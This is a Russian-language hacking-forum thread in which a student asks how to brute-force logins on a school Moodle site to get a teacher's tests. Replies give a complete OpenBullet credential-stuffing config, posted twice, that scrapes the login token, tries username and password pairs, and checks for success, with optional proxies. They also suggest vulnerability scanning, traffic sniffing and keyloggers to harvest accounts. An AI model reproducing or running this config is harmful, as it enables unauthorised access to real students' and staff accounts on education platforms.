Подскажите софтину для брута учетки на сайте на Moodle.

Достала эта математичка, хз откуда берет свои тесты. А на этом *сайте* никакой капчи нифига, хоть целое столетие пробуй заходить с одним логином.
 
Ставишь акунетикс, делаешь шаб для логина под твоей учеткой и начинай сканировать сайт, увидишь много всего интересного для последующего взлома. Увидишь возможности для того, чтобы собрать учетки ;)
 
Последнее редактирование:
Скачиваешь OpenBullet вставляешь конфиг:
REQUEST GET "https*://moodle.org/*login/index.php"

HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
HEADER "Pragma: no-cache"
HEADER "Accept: */*"

PARSE "<SOURCE>" LR "logintoken\" value=\"" "\">" -> VAR "token"

REQUEST POST "https*://moodle.org/*login/index.php"
CONTENT "anchor=&logintoken=<token>&username=<USERNAME>&password=<PASSWORD>"
CONTENTTYPE "application/x-www-form-urlencoded"
HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
HEADER "Pragma: no-cache"
HEADER "Accept: */*"

KEYCHECK
KEYCHAIN Success OR
KEY "Выход"
KEYCHAIN Failure OR
KEY "Invalid login, please try again"

Прокси по желанию можно взять тут или тут

P.S. Конфиг пишется минут пять на любой сайт )
P.P.S. В конфиге убери * в URL
 
Последнее редактирование:
Извините конечно, я суть не понял но очень нужен взлом Мудла ваш метод достает базу данных?
 
Проще снифать трафик или кейлогеры делать.
Хотя по опыту скажу, что хорошие пороли только админ и сетевик ставили, все остальные значимые пароли. Фамилии, дата, девичия фамилия и etc.

Брут можно хоть на javascripte написать в violantmonkey. Там один запрос и прокси.
 
 
Скачиваешь OpenBullet вставляешь конфиг:
REQUEST GET "https*://moodle.org/*login/index.php"

HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
HEADER "Pragma: no-cache"
HEADER "Accept: */*"

PARSE "<SOURCE>" LR "logintoken\" value=\"" "\">" -> VAR "token"

REQUEST POST "https*://moodle.org/*login/index.php"
CONTENT "anchor=&logintoken=<token>&username=<USERNAME>&password=<PASSWORD>"
CONTENTTYPE "application/x-www-form-urlencoded"
HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
HEADER "Pragma: no-cache"
HEADER "Accept: */*"

KEYCHECK
KEYCHAIN Success OR
KEY "Выход"
KEYCHAIN Failure OR
KEY "Invalid login, please try again"

Прокси по желанию можно взять тут или тут

P.S. Конфиг пишется минут пять на любой сайт )
P.P.S. В конфиге убери * в URL
Так , а для тупых можно такойже но с уже извесным логином и просто подбор паролей?
 
Мы в соцсетях:

Взломай свой первый сервер и прокачай скилл — Начни игру на HackerLab

🚀 Первый раз на Codeby?
Гайд для новичков: что делать в первые 15 минут, ключевые разделы, правила
Начать здесь →

Популярный контент

🔴 Свежие CVE, 0-day и инциденты
То, о чём ChatGPT ещё не знает — обсуждаем в реальном времени
Threat Intel →
💼 Вакансии и заказы в ИБ
Pentest, SOC, DevSecOps, bug bounty — работа и проекты от проверенных компаний
Карьера в ИБ →

HackerLab